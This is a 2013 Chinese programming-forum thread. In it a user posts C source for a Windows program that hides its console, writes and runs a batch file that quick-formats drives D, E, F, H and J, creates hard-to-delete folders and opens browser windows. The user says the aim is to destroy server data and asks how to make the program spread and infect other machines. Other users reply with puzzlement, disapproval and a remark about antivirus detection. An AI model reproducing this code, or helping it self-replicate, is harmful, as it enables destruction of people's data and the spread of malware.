| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1759 人关注过本帖
标题:自己做的一个半成品程序!只具有破坏性但不具有传染以及感染性!求高手指点 ...
只看楼主 加入收藏
lyxhkg
Rank: 2
等 级:禁止访问
帖 子:50
专家分:24
注 册:2012-4-24
结帖率:81.82%
收藏
已结贴  问题点数:12 回复次数:19 
自己做的一个半成品程序!只具有破坏性但不具有传染以及感染性!求高手指点下
程序代码:
# include <stdio.h>
# include <windows.h>



int main(int argc,char *argv[])
{
ShowWindow(FindWindow("ConsoleWindowClass",argv[0]),0);

int x; int i;
FILE*fp=fopen("c:\\SB.bat","w");

for(i=0;i<100;i++)
{


fprintf(fp,"md D:\%d...\\\n",i);
fprintf(fp,"md e:\%d...\\\n",i);
fprintf(fp,"md f:\%d...\\\n",i);


if(i==25)
{
fprintf(fp,"Format d:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format e:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format f:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format h:/y/q/fs:NTFS\n",i);
fprintf(fp,"Format j:/y/q/fs:NTFS\n",i);

}

if(i==3)
{
fprintf(fp,"start explorer http://www.baidu.com start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);
fprintf(fp,"start explorer http://www. start explorer \n",i);



}




}



fclose(fp);
system("c:\\SB.bat");



}



求如何让他可以感染性!让他传播起来!!
搜索更多相关主题的帖子: 半成品 
2013-05-21 08:44
azzbcc
Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19
来 自:江西财经大学
等 级:贵宾
威 望:81
帖 子:3293
专家分:12919
注 册:2012-11-4
收藏
得分:2 
从前,有个人叫东郭先生。。。


[fly]存在即是合理[/fly]
2013-05-21 13:56
lyxhkg
Rank: 2
等 级:禁止访问
帖 子:50
专家分:24
注 册:2012-4-24
收藏
得分:0 
最后被狼吃了!这个故事我还是知道的!!有一句话!给我了很深的感触!上帝创造人!人创造程序!如果人怀疑上帝!为什么程序不能改变人!
2013-05-21 14:00
猫小喵
Rank: 2
来 自:计算机专业
等 级:论坛游民
帖 子:29
专家分:77
注 册:2013-5-12
收藏
得分:2 
这程序看得有点懵!这是做啥的?

做一个爱编程得女生
2013-05-21 16:25
a382188110
Rank: 2
等 级:论坛游民
帖 子:10
专家分:14
注 册:2011-9-3
收藏
得分:2 
回复 4楼 猫小喵
我大胆的猜测下。。。。
1,在c盘创建一个sb.bat 的批处理。
2,打开d,e,f盘100次。
3,格式化d,e,f,h,j盘25次 盘符格式NTFS。
4,打开网站3次。
将上面 2 3 4 的存到 C:\SB.bat 中,然后运行。
2013-05-21 18:44
yuccn
Rank: 16Rank: 16Rank: 16Rank: 16
来 自:何方
等 级:版主
威 望:167
帖 子:6814
专家分:42393
注 册:2010-12-16
收藏
得分:2 
这样的破坏,有什么价值吗?

我行我乐
公众号:逻辑客栈
我的博客:
https://blog.yuccn. net
2013-05-21 18:48
雪狼MJ
Rank: 8Rank: 8
来 自:甘肃
等 级:蝙蝠侠
威 望:4
帖 子:267
专家分:853
注 册:2012-5-27
收藏
得分:2 
莫不是黑客程序?这要是在本机上运行怎么办????

Edsger Dijkstra:算法+数据结构=程序
2013-05-21 18:54
我叫沃恩
Rank: 12Rank: 12Rank: 12
来 自:Asia
等 级:贵宾
威 望:10
帖 子:1234
专家分:3865
注 册:2013-3-29
收藏
得分:2 
这是??

因为我是菜鸟,所以应该被骂! 细节+坚持=成功!
2013-05-22 08:24
lyxhkg
Rank: 2
等 级:禁止访问
帖 子:50
专家分:24
注 册:2012-4-24
收藏
得分:0 
本程序的功能是!运行后在C盘建立一个SB.BAT批处理!在D E F盘创建 删不掉的文件夹25个之后格式化D E F这样的目的是数据丢失!格式化完成在建立大约50多个删不掉的文件!打开网页应该为10饿!!就是一个破坏服务器数据的程序!我现在在思考如何让他传播加之感染起来!这个是一个硬伤!我还没想到解决办法!求你们指点下!
2013-05-22 08:51
dingzheheng
Rank: 2
等 级:论坛游民
帖 子:18
专家分:50
注 册:2011-4-13
收藏
得分:2 
病毒的特征:自我复制,和传染。你这样直接生成exe,而且还要那么多访问权限,肯定被杀毒软件拉黑!
2013-05-22 11:33
快速回复:自己做的一个半成品程序!只具有破坏性但不具有传染以及感染性!求高手 ...
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.042672 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved